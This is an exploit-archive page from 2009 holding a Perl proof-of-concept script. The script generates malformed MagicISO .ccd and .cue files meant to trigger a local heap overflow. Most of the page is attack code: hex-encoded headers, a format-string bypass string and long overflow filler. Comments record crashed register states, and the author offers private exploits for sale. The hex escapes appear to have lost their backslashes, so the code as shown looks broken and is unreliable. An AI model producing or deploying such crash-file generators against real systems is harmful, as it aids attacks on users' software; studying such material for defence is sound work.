MagicISO CCD/Cue Local Heap Overflow Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MagicISO CCD/Cue Local Heap Overflow Exploit PoC
# Published : 2009-04-16
# Author : Stack
# Previous Title : Apollo 37zz (M3u File) Local Heap Overflow PoC
# Next Title : MS Windows Media Player (.mid File) Integer Overflow PoC
#!/usr/bin/perl
#
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc
# ----------------------------------------------------------------
# Mountassif Moad 
# Stack ..
# Cyber-Zone .. 
#
# Private exploits for Kayako, contact me if anyone want buy it :d
#
# WARNING: Author has no responsibility over the damage done
# Probably impossible to exploit, but who knows? -_-' 
# Regiter for ccd
# EAX 44444141
# ECX 45459090
# EDX 90904443
# EBX 4545A094
# ESP 0012F3A0
# EBP 0012F3C4
# ESI 013AE64C
# EDI 013AF650
# EIP 005C04CE MagicISO.005C04CE
# Rgister for cue 
# EAX 0012F5D4
# ECX 013B0000
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."
# EBX 00001241 EBc overwrited 41 
# ESP 0012F4D8
# EBP 0012F4E4
# ESI 00001200
# EDI 00000000
# EIP 0047FE91 MagicISO.0047FE91
# Crash 
sub help {print "[!] usage :   n    perl $0 .cpp n    perl $0 .cue n  " ;exit();}
&help
unless $ARGV[0];
my $xpl = $ARGV[0];
my $header =  
            "x5Bx43x6Cx6Fx6Ex65x43x44x5Dx0Dx0Ax56x65x72x73x69".
            "x6Fx6Ex3Dx33x0Dx0Ax5Bx44x69x73x63x5Dx0Dx0Ax54x6F".
            "x63x45x6Ex74x72x69x65x73x3Dx34x0Dx0Ax53x65x73x73".
            "x69x6Fx6Ex73x3Dx31x0Dx0Ax44x61x74x61x54x72x61x63".
            "x6Bx73x53x63x72x61x6Dx62x6Cx65x64x3Dx30x0Dx0Ax43".
            "x44x54x65x78x74x4Cx65x6Ex67x74x68x3Dx30x0Dx0Ax5B".
            "x53x65x73x73x69x6Fx6Ex20x31x5Dx0Dx0Ax50x72x65x47".
            "x61x70x4Dx6Fx64x65x3Dx31x0Dx0Ax50x72x65x47x61x70".
            "x53x75x62x43x3Dx30x0Dx0Ax5Bx45x6Ex74x72x79x20x30".
            "x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6F".
            "x69x6Ex74x3Dx30x78x61x30x0Dx0Ax41x44x52x3Dx30x78".
            "x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34".
            "x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69".
            "x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72".
            "x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30".
            "x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx31".
            "x0Dx0Ax50x53x65x63x3Dx30x0Dx0Ax50x46x72x61x6Dx65".
            "x3Dx30x0Dx0Ax50x4Cx42x41x3Dx34x33x35x30x0Dx0Ax5B".
            "x45x6Ex74x72x79x20x31x5Dx0Dx0Ax53x65x73x73x69x6F".
            "x6Ex3Dx31x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x61x31x0D".
            "x0Ax41x44x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72".
            "x6Fx6Cx3Dx30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6F".
            "x3Dx30x0Dx0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63".
            "x3Dx30x0Dx0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4C".
            "x42x41x3Dx2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0D".
            "x0Ax50x4Dx69x6Ex3Dx31x0Dx0Ax50x53x65x63x3Dx30x0D".
            "x0Ax50x46x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3D".
            "x34x33x35x30x0Dx0Ax5Bx45x6Ex74x72x79x20x32x5Dx0D".
            "x0Ax53x65x73x73x69x6Fx6Ex3Dx31x0Dx0Ax50x6Fx69x6E".
            "x74x3Dx30x78x61x32x0Dx0Ax41x44x52x3Dx30x78x30x31".
            "x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3Dx30x78x30x34x0Dx0A".
            "x54x72x61x63x6Bx4Ex6Fx3Dx30x0Dx0Ax41x4Dx69x6Ex3D".
            "x30x0Dx0Ax41x53x65x63x3Dx30x0Dx0Ax41x46x72x61x6D".
            "x65x3Dx30x0Dx0Ax41x4Cx42x41x3Dx2Dx31x35x30x0Dx0A".
            "x5Ax65x72x6Fx3Dx30x0Dx0Ax50x4Dx69x6Ex3Dx30x0Dx0A".
            "x50x53x65x63x3Dx32x0Dx0Ax50x46x72x61x6Dx65x3Dx33".
            "x34x0Dx0Ax50x4Cx42x41x3Dx33x34x0Dx0Ax5Bx45x6Ex74".
            "x72x79x20x33x5Dx0Dx0Ax53x65x73x73x69x6Fx6Ex3Dx31".
            "x0Dx0Ax50x6Fx69x6Ex74x3Dx30x78x30x31x0Dx0Ax41x44".
            "x52x3Dx30x78x30x31x0Dx0Ax43x6Fx6Ex74x72x6Fx6Cx3D".
            "x30x78x30x34x0Dx0Ax54x72x61x63x6Bx4Ex6Fx3Dx30x0D".
            "x0Ax41x4Dx69x6Ex3Dx30x0Dx0Ax41x53x65x63x3Dx30x0D".
            "x0Ax41x46x72x61x6Dx65x3Dx30x0Dx0Ax41x4Cx42x41x3D".
            "x2Dx31x35x30x0Dx0Ax5Ax65x72x6Fx3Dx30x0Dx0Ax50x4D".
            "x69x6Ex3Dx30x0Dx0Ax50x53x65x63x3Dx32x0Dx0Ax50x46".
            "x72x61x6Dx65x3Dx30x0Dx0Ax50x4Cx42x41x3Dx30x0Dx0A".
            "x5Bx54x52x41x43x4Bx20x31x5Dx0Dx0Ax4Dx4Fx44x45x3D".
            "x31x0Dx0Ax49x4Ex44x45x58x20x31x3Dx39x39x39";
   
   
my $header1=    
            "x46x49x4cx45x20x22";
my $header2=
            "x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20".
            "x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32".
            "x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31".
            "x20x30x30x3ax30x30x3ax30x30";
   
my $bypass=
"x39x39x39x41x78x25x4ex25x4ex25x4ex25x4ex25x4ex25".
"x4ex25x4ex25x4ex25x4ex25x4ex25x4ex25x25x4ex25x4e".
"x25x4ex25x4ex41x63x66x63x64x32x30x38x34x39x35x64".
"x35x36x35x65x66x36x36x65x37x64x66x66x39x66x39x38".
"x37x36x34x64x61x63x34x63x61x34x32x33x38x61x30";
my $edx = "x43x43x43x43";
my $Bof = "x41" x 4004;
my $eax = "x44x44x44x44";
my $Nop = "x90" x 4;
my $ecx = "x45x45x45x45";
my $Sop = "x91" x 20;
my $Hof = "x46" x 5000;

if ($xpl eq '.ccd')
{open(file,'>Exploit.ccd');print file $header.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof;close(file);print "[!] Done n";}
elsif ($xpl eq '.cue')
{open(file,'>Exploit.cue');print file $header1.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof.$header2;close(file);print "[!] Done n"}
else {&help}

# www.Syue.com [2009-04-16]